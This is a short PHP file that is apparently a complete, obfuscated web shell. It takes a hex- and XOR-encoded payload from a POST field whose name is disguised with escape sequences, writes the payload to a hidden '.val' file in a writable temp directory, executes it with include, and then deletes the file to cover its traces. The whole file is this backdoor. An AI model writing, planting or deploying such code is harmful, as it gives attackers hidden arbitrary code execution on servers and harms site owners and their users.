<?php

if(isset($_POST["\x64\x61ta"])){
	$ent = array_filter(["/tmp", sys_get_temp_dir(), getenv("TEMP"), session_save_path(), ini_get("upload_tmp_dir"), getcwd(), getenv("TMP"), "/dev/shm", "/var/tmp"]);
	$bind = hex2bin($_POST["\x64\x61ta"]);
	$pointer = '' ; foreach(str_split($bind) as $char){$pointer .= chr(ord($char) ^ 82);}
	for ($data_chunk = 0, $obj = count($ent); $data_chunk < $obj; $data_chunk++) {
    $ref = $ent[$data_chunk];
    		if ((function($d) { return is_dir($d) && is_writable($d); })($ref)) {
    $tkn = "$ref/.val";
    $file = fopen($tkn, 'w');
if ($file) {
	fwrite($file, $pointer);
	fclose($file);
	include $tkn;
	@unlink($tkn);
	die();
}
}
}
}